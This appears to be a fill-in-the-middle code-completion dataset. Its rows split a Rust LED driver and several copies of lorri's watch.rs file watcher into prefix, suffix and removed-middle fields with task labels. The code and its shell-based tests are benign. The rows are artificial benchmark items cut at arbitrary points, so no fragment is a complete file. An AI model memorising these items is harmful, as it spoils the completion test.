LED::new_with_file(File::create(path).unwrap())
}
fn new_with_file(file: File) -> LED {
let mut led = LED {
value: false,
file: file,
};
// Turn the LED off by default.
led.off().unwrap();
led
}
// Turn the LED on (same as `high`).
pub fn on(&mut self) -> Result<(), io::Error> {
self.high()
}
// Turn the LED off (same as `low`).
pub fn off(&mut self) -> Result<(), io::Error> {
self.low()
}
// Turn the LED on.
pub fn high(&mut self) -> Result<(), io::Error> {
self.write(true)
}
// Turn the LED off.
pub fn low(&mut self) -> Result<(), io::Error> {
self.write(false)
}
// Sets the LED to the opposite of its current state.
pub fn toggle(&mut self) -> Result<(), io::Error> {
let new_value = !self.value;
self.write(new_value)
}
// Returns the current state of the LED.
pub fn read(&self) -> bool {
self.value
}
// Helper function to write new state to LED filepath.
fn write(&mut self, new_value: bool) -> Result<(), io::Error> {
// Save the new value to the model.
self.value = new_value;
// Return the binary representation of that value type.
let string_value = match new_value {
true => b'1',
false => b'0',
};
// Write that data to the file and return the result.
self.file.write_all(&[string_value])
}
}
#[cfg(test)]
mod tests {
extern crate tempfile;
use super::*;
use std::io::{Read, Seek, SeekFrom};
#[test]
fn led_writes_to_file() {
let mut tmpfile = tempfile::tempfile().unwrap();
// The tmpfile handle can be reused as long as LED gets its own
// clone of the handle, and we are diligent about seeking.
// This avoids needing to figure out where the tmpfile is in order
// to open more handles.
let mut led = LED::new_with_file(tmpfile.try_clone().unwrap());
let mut buf = String::new();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
assert_eq!("0", buf);
led.on().unwrap();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
// b'1' is written as 001 into the file.
assert_eq!("001", buf);
}
} | pub struct Tessel {
// A group of module ports. | random_line_split |
watch.rs | //! Recursively watch paths for changes, in an extensible and
//! cross-platform way.
use crate::NixFile;
use crossbeam_channel as chan;
use notify::event::ModifyKind;
use notify::{EventKind, RecommendedWatcher, RecursiveMode, Watcher};
use slog_scope::{debug, info};
use std::collections::HashSet;
use std::path::{Path, PathBuf};
use std::time::Duration;
/// A dynamic list of paths to watch for changes, and
/// react to changes when they occur.
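///
/// # Example
///
/// A minimal usage sketch (not compiled as a doc-test; the watched path and
/// the error handling are illustrative only, based on the API in this module):
///
/// ```ignore
/// let mut watch = Watch::try_new().expect("failed to initialize watcher");
/// watch
///     .extend(vec![std::path::PathBuf::from("shell.nix")])
///     .expect("failed to add paths to the watch list");
/// for event in watch.rx.iter() {
///     match watch.process(event) {
///         Some(Ok(reason)) => println!("change detected: {:?}", reason),
///         Some(Err(err)) => eprintln!("could not interpret event: {:?}", err),
///         None => {} // irrelevant filesystem noise, e.g. /nix/store paths
///     }
/// }
/// ```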
pub struct Watch {
/// Event receiver. Process using `Watch::process`.
pub rx: chan::Receiver<notify::Result<notify::Event>>,
notify: RecommendedWatcher,
watches: HashSet<PathBuf>,
}
/// A debug message string that can only be displayed via `Debug`.
#[derive(Clone, Debug, Serialize)]
pub struct DebugMessage(pub String);
#[derive(Debug, PartialEq, Eq)]
struct FilteredOut<'a> {
reason: &'a str,
path: PathBuf,
}
/// Description of the project change that triggered a build.
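///
/// A consumer typically reacts to these in its build loop; a hedged sketch
/// (`trigger_build` is a hypothetical callback, not part of this module):
///
/// ```ignore
/// match reason {
///     Reason::PingReceived | Reason::ProjectAdded(_) => trigger_build(),
///     Reason::FilesChanged(paths) => {
///         println!("files changed: {:?}", paths);
///         trigger_build()
///     }
///     Reason::UnknownEvent(msg) => eprintln!("unhandled event: {:?}", msg),
/// }
/// ```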
#[derive(Clone, Debug, Serialize)]
#[serde(rename_all = "snake_case")]
pub enum Reason {
/// When a project is presented to Lorri to track, it's built for this reason.
ProjectAdded(NixFile),
/// When a ping is received.
PingReceived,
/// When there is a filesystem change, the first changed file is recorded,
/// along with a count of other filesystem events.
FilesChanged(Vec<PathBuf>),
/// When the underlying notifier reports something strange.
UnknownEvent(DebugMessage),
}
/// We weren’t able to understand a `notify::Event`.
#[derive(Clone, Debug)]
pub enum EventError {
/// No message was received from the raw event channel
RxNoEventReceived,
/// The changed file event had no file path
EventHasNoFilePath(notify::Event),
}
impl Watch {
/// Instantiate a new Watch.
pub fn try_new() -> Result<Watch, notify::Error> {
let (tx, rx) = chan::unbounded();
Ok(Watch {
notify: Watcher::new(tx, Duration::from_millis(100))?,
watches: HashSet::new(),
rx,
})
}
/// Process `notify::Event`s coming in via `Watch::rx`.
///
/// `None` if there were no relevant changes.
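///
/// See the example on [`Watch`] for a typical processing loop.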
pub fn process(
&self,
event: notify::Result<notify::Event>,
) -> Option<Result<Reason, EventError>> {
match event {
Err(err) => panic!("notify error: {}", err),
Ok(event) => {
self.log_event(&event);
if event.paths.is_empty() {
Some(Err(EventError::EventHasNoFilePath(event)))
} else {
let notify::Event { paths, kind, .. } = event;
let interesting_paths: Vec<PathBuf> = paths
.into_iter()
.filter(|p| self.path_is_interesting(p, &kind))
.collect();
if !interesting_paths.is_empty() {
Some(Ok(Reason::FilesChanged(interesting_paths)))
} else {
None
}
}
}
}
}
/// Extend the watch list with an additional list of paths.
/// Note: Watch maintains a list of already watched paths, and
/// will not add duplicates.
pub fn extend(&mut self, paths: Vec<PathBuf>) -> Result<(), notify::Error> {
for path in paths {
let recursive_paths = walk_path_topo(path)?;
for p in recursive_paths {
let p = p.canonicalize()?;
match Self::extend_filter(p) {
Err(FilteredOut { reason, path }) => {
debug!("Skipping watching {}: {}", path.display(), reason)
}
Ok(p) => {
self.add_path(p)?;
}
}
}
}
Ok(())
}
fn extend_filter(path: PathBuf) -> Result<PathBuf, FilteredOut<'static>> {
if path.starts_with(Path::new("/nix/store")) {
Err(FilteredOut {
path,
reason: "starts with /nix/store",
})
} else {
Ok(path)
}
}
fn log_event(&self, event: &notify::Event) {
debug!("Watch Event: {:#?}", event);
match &event.kind {
notify::event::EventKind::Remove(_) if !event.paths.is_empty() => {
info!("identified removal: {:?}", &event.paths);
}
_ => {
debug!("watch event"; "event" => ?event);
}
}
}
fn add_path(&mut self, path: PathBuf) -> Result<(), notify::Error> {
if !self.watches.contains(&path) {
debug!("watching path"; "path" => path.to_str());
self.notify.watch(&path, RecursiveMode::NonRecursive)?;
self.watches.insert(path.clone());
}
if let Some(parent) = path.parent() {
if !self.watches.contains(parent) {
debug!("watching parent path"; "parent_path" => parent.to_str());
self.notify.watch(&parent, RecursiveMode::NonRecursive)?;
}
}
Ok(())
}
fn path_is_interesting(&self, path: &PathBuf, kind: &EventKind) -> bool {
path_match(&self.watches, path)
&& match kind {
// We ignore metadata modification events for the profiles directory
// tree as it is a symlink forest that is used to keep track of
// channels and nix will unconditionally update the metadata of each
// link in this forest. See https://github.com/NixOS/nix/blob/629b9b0049363e091b76b7f60a8357d9f94733cc/src/libstore/local-store.cc#L74-L80
// for the unconditional update. These metadata modification events are
// spurious and they can easily cause a rebuild-loop when a shell.nix
// file does not pin its version of nixpkgs or other channels. When
// a Nix channel is updated, we receive many other types of events, so
// ignoring these metadata modifications will not impact lorri's
// ability to correctly watch for channel changes.
EventKind::Modify(ModifyKind::Metadata(_)) => {
if path.starts_with(Path::new("/nix/var/nix/profiles/per-user")) {
debug!("ignoring spurious metadata change event within the profiles dir"; "path" => path.to_str());
false
} else {
true
}
}
_ => true,
}
}
}
/// Lists the dirs and files in a directory, as two vectors.
/// Given path must be a readable directory.
fn list_dir(dir: &Path) -> Result<(Vec<PathBuf>, Vec<PathBuf>), std::io::Error> {
let mut dirs = vec![];
let mut files = vec![];
for entry in std::fs::read_dir(dir)? {
let entry = entry?;
if entry.file_type()?.is_dir() {
dirs.push(entry.path())
} else {
files.push(entry.path())
}
}
Ok((dirs, files))
}
/// List all children of the given path.
/// Recurses into directories.
///
/// Returns the given path first, then a topologically sorted list of children, if any.
///
/// All files have to be readable, or the function aborts.
/// TODO: gracefully skip unreadable files.
fn walk_path_topo(path: PathBuf) -> Result<Vec<PathBuf>, std::io::Error> {
// push our own path first
let mut res = vec![path.clone()];
// nothing to list
if !path.is_dir() {
return Ok(res);
}
let (dirs, mut files) = list_dir(&path)?;
// plain files
res.append(&mut files);
// now go through the list, appending new
// directories to the work queue as you find them.
let mut work = std::collections::VecDeque::from(dirs);
loop {
match work.pop_front() {
// no directories remaining
None => break,
Some(dir) => {
res.push(dir.clone());
let (dirs, mut files) = list_dir(&dir)?;
res.append(&mut files);
work.append(&mut std::collections::VecDeque::from(dirs));
}
}
}
Ok(res)
}
/// Determine if the event path is covered by our list of watched
/// paths.
///
/// Returns true if:
/// - the event's path directly names a path in our
/// watch list
/// - the event's path names a canonicalized path in our watch list
/// - the event's path's parent directly names a path in our watch
/// list
/// - the event's path's parent names a canonicalized path in our
/// watch list
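///
/// Illustrative sketch (hypothetical paths, not taken from a real watch list):
///
/// ```ignore
/// let mut watched: HashSet<PathBuf> = HashSet::new();
/// watched.insert(PathBuf::from("/project"));
/// watched.insert(PathBuf::from("/project/shell.nix"));
/// // direct match against a watched path
/// assert!(path_match(&watched, Path::new("/project/shell.nix")));
/// // parent match: "/project" is watched, so events for files inside it match
/// assert!(path_match(&watched, Path::new("/project/foo.nix")));
/// ```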
fn path_match(watched_paths: &HashSet<PathBuf>, event_path: &Path) -> bool {
let event_parent = event_path.parent();
let matches = |watched: &Path| {
if event_path == watched {
debug!(
"event path directly matches watched path";
"event_path" => event_path.to_str());
return true;
}
if let Some(parent) = event_parent {
if parent == watched {
debug!(
"event path parent matches watched path";
"event_path" => event_path.to_str(), "parent_path" => parent.to_str());
return true;
}
}
false
};
watched_paths.iter().any(|watched| {
if matches(watched) {
return true;
}
if let Ok(canonicalized_watch) = watched.canonicalize() {
if matches(&canonicalized_watch) {
return true;
}
}
false
})
}
#[cfg(test)]
mod tests {
use super::{EventError, Reason, Watch};
use crate::bash::expect_bash;
use std::path::PathBuf;
use std::thread::sleep;
use std::time::Duration;
use tempfile::tempdir;
/// upper bound on how long the watcher may take to deliver events (if it’s hit, something is broken)
fn upper_watcher_timeout() -> Duration {
// CI machines are very slow sometimes.
Duration::from_millis(1000)
}
/// Collect all notifications
fn process_all(watch: &Watch) -> Vec<Option<Result<Reason, EventError>>> {
watch.rx.try_iter().map(|e| watch.process(e)).collect()
}
/// Returns true iff the given file has changed
fn file_changed(watch: &Watch, file_name: &str) -> (bool, Vec<Reason>) {
let mut reasons = Vec::new();
let mut changed = false;
for event in process_all(watch) {
if let Some(Ok(reason)) = event {
reasons.push(reason.clone());
if let Reason::FilesChanged(files) = reason {
changed = changed
|| files
.iter()
.map(|p| p.file_name())
.filter(|f| f.is_some())
.map(|f| f.unwrap())
.any(|f| f == file_name)
}
}
}
(changed, reasons)
}
fn assert_file_changed(watch: &Watch, file_name: &str) {
let (file_changed, events) = file_changed(watch, file_name);
assert!(
file_changed,
"no file change notification for '{}'; these events occurred instead: {:?}",
file_name, events
);
}
/// Returns true iff there were no changes
fn no_changes(watch: &Watch) -> bool {
process_all(watch).iter().filter(|e| e.is_some()).count() == 0
}
#[cfg(target_os = "macos")]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// Sometimes a brand new watch will send a CREATE notification
// for a file which was just created, even if the watch was
// created after the file was made.
//
// Our tests want to be very precise about which events are
// received when, so expect these initial events and swallow
// them.
//
// Note, this is racy in the kernel. Otherwise I'd assert
// this is empty.
sleep(upper_watcher_timeout());
process_all(watcher).is_empty();
}
#[cfg(not(target_os = "macos"))]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// If we're supposedly dealing with a late notification on
// macOS, we'd better not receive any messages on other
// platforms.
//
// If we do receive any notifications, our test is broken.
sleep(upper_watcher_timeout());
assert!(process_all(watcher).is_empty());
}
#[test]
fn trivial_watch_whole_directory() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().to_path_buf()]).unwrap();
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn trivial_watch_specific_file() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn rename_over_vim() {
// Vim renames files into place for atomic writes
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
// bar is not watched, expect error
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
// Do it a second time
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn walk_path_topo_filetree() -> std::io::Result<()> {
let temp = tempdir().unwrap();
let files = vec![("a", "b"), ("a", "c"), ("a/d", "e"), ("x/y", "z")];
for (dir, file) in files {
std::fs::create_dir_all(temp.path().join(dir))?;
std::fs::write(temp.path().join(dir).join(file), [])?;
}
let res = super::walk_path_topo(temp.path().to_owned())?;
// check that the list is topologically sorted
// by making sure *no* later path is a prefix of a previous path.
let mut inv = res.clone();
inv.reverse();
for i in 0..inv.len() {
for predecessor in inv.iter().skip(i + 1) {
assert!(
!predecessor.starts_with(&inv[i]),
"{:?} is a prefix of {:?}, even though it comes later in list, thus topological order is not given!\nFull list: {:#?}",
inv[i], predecessor, res
)
}
}
// make sure the resulting list contains the same
// paths as the original list.
let mut res2 = res.clone();
res2.sort();
let mut all_paths = vec![
// our given path first
"", "a", // direct files come before nested directories
"a/b", "a/c", "x", "a/d", "a/d/e", "x/y", "x/y/z",
]
.iter()
.map(|p| temp.path().join(p).to_owned())
.collect::<Vec<_>>();
all_paths.sort();
assert_eq!(res2, all_paths);
Ok(())
}
#[test]
fn extend_filter() {
| let nix = PathBuf::from("/nix/store/njlavpa90laywf22b1myif5101qhln8r-hello-2.10");
match super::Watch::extend_filter(nix.clone()) {
Ok(path) => assert!(false, "{:?} should be filtered!", path),
Err(super::FilteredOut { path, reason }) => {
drop(reason);
assert_eq!(path, nix)
}
}
let other = PathBuf::from("/home/foo/project/foobar.nix");
assert_eq!(super::Watch::extend_filter(other.clone()), Ok(other));
}
}
| identifier_body |
|
watch.rs | //! Recursively watch paths for changes, in an extensible and
//! cross-platform way.
use crate::NixFile;
use crossbeam_channel as chan;
use notify::event::ModifyKind;
use notify::{EventKind, RecommendedWatcher, RecursiveMode, Watcher};
use slog_scope::{debug, info};
use std::collections::HashSet;
use std::path::{Path, PathBuf};
use std::time::Duration;
/// A dynamic list of paths to watch for changes, and
/// react to changes when they occur.
pub struct Watch {
/// Event receiver. Process using `Watch::process`.
pub rx: chan::Receiver<notify::Result<notify::Event>>,
notify: RecommendedWatcher,
watches: HashSet<PathBuf>,
}
/// A debug message string that can only be displayed via `Debug`.
#[derive(Clone, Debug, Serialize)]
pub struct DebugMessage(pub String);
#[derive(Debug, PartialEq, Eq)]
struct FilteredOut<'a> {
reason: &'a str,
path: PathBuf,
}
/// Description of the project change that triggered a build.
#[derive(Clone, Debug, Serialize)]
#[serde(rename_all = "snake_case")]
pub enum Reason {
/// When a project is presented to Lorri to track, it's built for this reason.
ProjectAdded(NixFile),
/// When a ping is received.
PingReceived,
/// When there is a filesystem change, the first changed file is recorded,
/// along with a count of other filesystem events.
FilesChanged(Vec<PathBuf>),
/// When the underlying notifier reports something strange.
UnknownEvent(DebugMessage),
}
/// We weren’t able to understand a `notify::Event`.
#[derive(Clone, Debug)]
pub enum EventError {
/// No message was received from the raw event channel
RxNoEventReceived,
/// The changed file event had no file path
EventHasNoFilePath(notify::Event),
}
impl Watch {
/// Instantiate a new Watch.
pub fn try_new() -> Result<Watch, notify::Error> {
let (tx, rx) = chan::unbounded();
Ok(Watch {
notify: Watcher::new(tx, Duration::from_millis(100))?,
watches: HashSet::new(),
rx,
})
}
/// Process `notify::Event`s coming in via `Watch::rx`.
///
/// `None` if there were no relevant changes.
pub fn process(
&self,
event: notify::Result<notify::Event>,
) -> Option<Result<Reason, EventError>> {
match event {
Err(err) => panic!("notify error: {}", err),
Ok(event) => {
self.log_event(&event);
if event.paths.is_empty() {
Some(Err(EventError::EventHasNoFilePath(event)))
} else {
let notify::Event { paths, kind, .. } = event;
let interesting_paths: Vec<PathBuf> = paths
.into_iter()
.filter(|p| self.path_is_interesting(p, &kind))
.collect();
if !interesting_paths.is_empty() {
Some(Ok(Reason::FilesChanged(interesting_paths)))
} else {
None
}
}
}
}
}
/// Extend the watch list with an additional list of paths.
/// Note: Watch maintains a list of already watched paths, and
/// will not add duplicates.
pub fn extend(&mut self, paths: Vec<PathBuf>) -> Result<(), notify::Error> {
for path in paths {
let recursive_paths = walk_path_topo(path)?;
for p in recursive_paths {
let p = p.canonicalize()?;
match Self::extend_filter(p) {
Err(FilteredOut { reason, path }) => {
debug!("Skipping watching {}: {}", path.display(), reason)
}
Ok(p) => {
self.add_path(p)?;
}
}
}
}
Ok(())
}
fn extend_filter(path: PathBuf) -> Result<PathBuf, FilteredOut<'static>> {
if path.starts_with(Path::new("/nix/store")) {
Err(FilteredOut {
path,
reason: "starts with /nix/store",
})
} else {
Ok(path)
}
}
fn log_event(&self, event: ¬ify::Event) {
debug!("Watch Event: {:#?}", event);
match &event.kind {
notify::event::EventKind::Remove(_) if !event.paths.is_empty() => {
info!("identified removal: {:?}", &event.paths);
}
_ => {
debug!("watch event"; "event" => ?event);
}
}
}
fn add_path(&mut self, path: PathBuf) -> Result<(), notify::Error> {
if !self.watches.contains(&path) {
debug!("watching path"; "path" => path.to_str());
self.notify.watch(&path, RecursiveMode::NonRecursive)?;
self.watches.insert(path.clone());
}
if let Some(parent) = path.parent() {
if !self.watches.contains(parent) {
debug!("watching parent path"; "parent_path" => parent.to_str());
self.notify.watch(&parent, RecursiveMode::NonRecursive)?;
}
}
Ok(())
}
fn path_is_interesting(&self, path: &PathBuf, kind: &EventKind) -> bool {
path_match(&self.watches, path)
&& match kind {
// We ignore metadata modification events for the profiles directory
// tree as it is a symlink forest that is used to keep track of
// channels and nix will unconditionally update the metadata of each
// link in this forest. See https://github.com/NixOS/nix/blob/629b9b0049363e091b76b7f60a8357d9f94733cc/src/libstore/local-store.cc#L74-L80
// for the unconditional update. These metadata modification events are
// spurious and they can easily cause a rebuild-loop when a shell.nix
// file does not pin its version of nixpkgs or other channels. When
// a Nix channel is updated we receive many other types of events, so
// ignoring these metadata modifications will not impact lorri's
// ability to correctly watch for channel changes.
EventKind::Modify(ModifyKind::Metadata(_)) => {
if path.starts_with(Path::new("/nix/var/nix/profiles/per-user")) {
debug!("ignoring spurious metadata change event within the profiles dir"; "path" => path.to_str());
false
} else {
true
}
}
_ => true,
}
}
}
/// Lists the dirs and files in a directory, as two vectors.
/// Given path must be a readable directory.
fn list_dir(dir: &Path) -> Result<(Vec<PathBuf>, Vec<PathBuf>), std::io::Error> {
let mut dirs = vec![];
let mut files = vec![];
for entry in std::fs::read_dir(dir)? {
let entry = entry?;
if entry.file_type()?.is_dir() {
dirs.push(entry.path())
} else {
files.push(entry.path())
}
}
Ok((dirs, files))
}
/// List all children of the given path.
/// Recurses into directories.
///
/// Returns the given path first, then a topologically sorted list of children, if any.
///
/// All files have to be readable, or the function aborts.
/// TODO: gracefully skip unreadable files.
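///
/// Illustrative sketch (hypothetical layout): for a directory `root` containing a file `f`
/// and a sub-directory `a` that itself contains a file `b`, the parent always precedes its
/// children in the result:
///
/// ```ignore
/// let all = walk_path_topo(PathBuf::from("root"))?;
/// // all == [root, root/f, root/a, root/a/b]
/// ```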
fn walk_path_topo(path: PathBuf) -> Result<Vec<PathBuf>, std::io::Error> {
// push our own path first
let mut res = vec![path.clone()];
// nothing to list
if !path.is_dir() {
return Ok(res);
}
let (dirs, mut files) = list_dir(&path)?;
// plain files
res.append(&mut files);
// now go through the list, appending new
// directories to the work queue as you find them.
let mut work = std::collections::VecDeque::from(dirs);
loop {
match work.pop_front() {
// no directories remaining
None => break,
Some(dir) => {
res.push(dir.clone());
let (dirs, mut files) = list_dir(&dir)?;
res.append(&mut files);
work.append(&mut std::collections::VecDeque::from(dirs));
}
}
}
Ok(res)
}
/// Determine if the event path is covered by our list of watched
/// paths.
///
/// Returns true if:
/// - the event's path directly names a path in our
/// watch list
/// - the event's path names a canonicalized path in our watch list
/// - the event's path's parent directly names a path in our watch
/// list
/// - the event's path's parent names a canonicalized path in our
/// watch list
fn path_match(watched_paths: &HashSet<PathBuf>, event_path: &Path) -> bool {
let event_parent = event_path.parent();
let matches = |watched: &Path| {
if event_path == watched {
debug!(
"event path directly matches watched path";
"event_path" => event_path.to_str());
return true;
}
if let Some(parent) = event_parent {
| false
};
watched_paths.iter().any(|watched| {
if matches(watched) {
return true;
}
if let Ok(canonicalized_watch) = watched.canonicalize() {
if matches(&canonicalized_watch) {
return true;
}
}
false
})
}
#[cfg(test)]
mod tests {
use super::{EventError, Reason, Watch};
use crate::bash::expect_bash;
use std::path::PathBuf;
use std::thread::sleep;
use std::time::Duration;
use tempfile::tempdir;
/// upper bound on how long the watcher may take to deliver events (if it’s hit, something is broken)
fn upper_watcher_timeout() -> Duration {
// CI machines are very slow sometimes.
Duration::from_millis(1000)
}
/// Collect all notifications
fn process_all(watch: &Watch) -> Vec<Option<Result<Reason, EventError>>> {
watch.rx.try_iter().map(|e| watch.process(e)).collect()
}
/// Returns true iff the given file has changed
fn file_changed(watch: &Watch, file_name: &str) -> (bool, Vec<Reason>) {
let mut reasons = Vec::new();
let mut changed = false;
for event in process_all(watch) {
if let Some(Ok(reason)) = event {
reasons.push(reason.clone());
if let Reason::FilesChanged(files) = reason {
changed = changed
|| files
.iter()
.map(|p| p.file_name())
.filter(|f| f.is_some())
.map(|f| f.unwrap())
.any(|f| f == file_name)
}
}
}
(changed, reasons)
}
fn assert_file_changed(watch: &Watch, file_name: &str) {
let (file_changed, events) = file_changed(watch, file_name);
assert!(
file_changed,
"no file change notification for '{}'; these events occurred instead: {:?}",
file_name, events
);
}
/// Returns true iff there were no changes
fn no_changes(watch: &Watch) -> bool {
process_all(watch).iter().filter(|e| e.is_some()).count() == 0
}
#[cfg(target_os = "macos")]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// Sometimes a brand new watch will send a CREATE notification
// for a file which was just created, even if the watch was
// created after the file was made.
//
// Our tests want to be very precise about which events are
// received when, so expect these initial events and swallow
// them.
//
// Note, this is racy in the kernel. Otherwise I'd assert
// this is empty.
sleep(upper_watcher_timeout());
process_all(watcher).is_empty();
}
#[cfg(not(target_os = "macos"))]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// If we're supposedly dealing with a late notification on
// macOS, we'd better not receive any messages on other
// platforms.
//
// If we do receive any notifications, our test is broken.
sleep(upper_watcher_timeout());
assert!(process_all(watcher).is_empty());
}
#[test]
fn trivial_watch_whole_directory() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().to_path_buf()]).unwrap();
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn trivial_watch_specific_file() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn rename_over_vim() {
// Vim renames files into place for atomic writes
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
// bar is not watched, expect error
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
// Do it a second time
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn walk_path_topo_filetree() -> std::io::Result<()> {
let temp = tempdir().unwrap();
let files = vec![("a", "b"), ("a", "c"), ("a/d", "e"), ("x/y", "z")];
for (dir, file) in files {
std::fs::create_dir_all(temp.path().join(dir))?;
std::fs::write(temp.path().join(dir).join(file), [])?;
}
let res = super::walk_path_topo(temp.path().to_owned())?;
// check that the list is topologically sorted
// by making sure *no* later path is a prefix of a previous path.
let mut inv = res.clone();
inv.reverse();
for i in 0..inv.len() {
for predecessor in inv.iter().skip(i + 1) {
assert!(
!predecessor.starts_with(&inv[i]),
"{:?} is a prefix of {:?}, even though it comes later in list, thus topological order is not given!\nFull list: {:#?}",
inv[i], predecessor, res
)
}
}
// make sure the resulting list contains the same
// paths as the original list.
let mut res2 = res.clone();
res2.sort();
let mut all_paths = vec![
// our given path first
"", "a", // direct files come before nested directories
"a/b", "a/c", "x", "a/d", "a/d/e", "x/y", "x/y/z",
]
.iter()
.map(|p| temp.path().join(p).to_owned())
.collect::<Vec<_>>();
all_paths.sort();
assert_eq!(res2, all_paths);
Ok(())
}
#[test]
fn extend_filter() {
let nix = PathBuf::from("/nix/store/njlavpa90laywf22b1myif5101qhln8r-hello-2.10");
match super::Watch::extend_filter(nix.clone()) {
Ok(path) => assert!(false, "{:?} should be filtered!", path),
Err(super::FilteredOut { path, reason }) => {
drop(reason);
assert_eq!(path, nix)
}
}
let other = PathBuf::from("/home/foo/project/foobar.nix");
assert_eq!(super::Watch::extend_filter(other.clone()), Ok(other));
}
}
| if parent == watched {
debug!(
"event path parent matches watched path";
"event_path" => event_path.to_str(), "parent_path" => parent.to_str());
return true;
}
}
| conditional_block |
watch.rs | //! Recursively watch paths for changes, in an extensible and
//! cross-platform way.
use crate::NixFile;
use crossbeam_channel as chan;
use notify::event::ModifyKind;
use notify::{EventKind, RecommendedWatcher, RecursiveMode, Watcher};
use slog_scope::{debug, info};
use std::collections::HashSet;
use std::path::{Path, PathBuf};
use std::time::Duration;
/// A dynamic list of paths to watch for changes, and
/// react to changes when they occur.
pub struct Watch {
/// Event receiver. Process using `Watch::process`.
pub rx: chan::Receiver<notify::Result<notify::Event>>,
notify: RecommendedWatcher,
watches: HashSet<PathBuf>,
}
/// A debug message string that can only be displayed via `Debug`.
#[derive(Clone, Debug, Serialize)]
pub struct DebugMessage(pub String);
#[derive(Debug, PartialEq, Eq)]
struct FilteredOut<'a> {
reason: &'a str,
path: PathBuf,
}
/// Description of the project change that triggered a build.
#[derive(Clone, Debug, Serialize)]
#[serde(rename_all = "snake_case")]
pub enum Reason {
/// When a project is presented to Lorri to track, it's built for this reason.
ProjectAdded(NixFile),
/// When a ping is received.
PingReceived,
/// When there is a filesystem change, the first changed file is recorded,
/// along with a count of other filesystem events.
FilesChanged(Vec<PathBuf>),
/// When the underlying notifier reports something strange.
UnknownEvent(DebugMessage),
}
/// We weren’t able to understand a `notify::Event`.
#[derive(Clone, Debug)]
pub enum EventError {
/// No message was received from the raw event channel
RxNoEventReceived,
/// The changed file event had no file path
EventHasNoFilePath(notify::Event),
}
impl Watch {
/// Instantiate a new Watch.
pub fn try_new() -> Result<Watch, notify::Error> {
let (tx, rx) = chan::unbounded();
Ok(Watch {
notify: Watcher::new(tx, Duration::from_millis(100))?,
watches: HashSet::new(),
rx,
})
}
/// Process `notify::Event`s coming in via `Watch::rx`.
///
/// `None` if there were no relevant changes.
pub fn process(
&self,
event: notify::Result<notify::Event>,
) -> Option<Result<Reason, EventError>> {
match event {
Err(err) => panic!("notify error: {}", err),
Ok(event) => {
self.log_event(&event);
if event.paths.is_empty() {
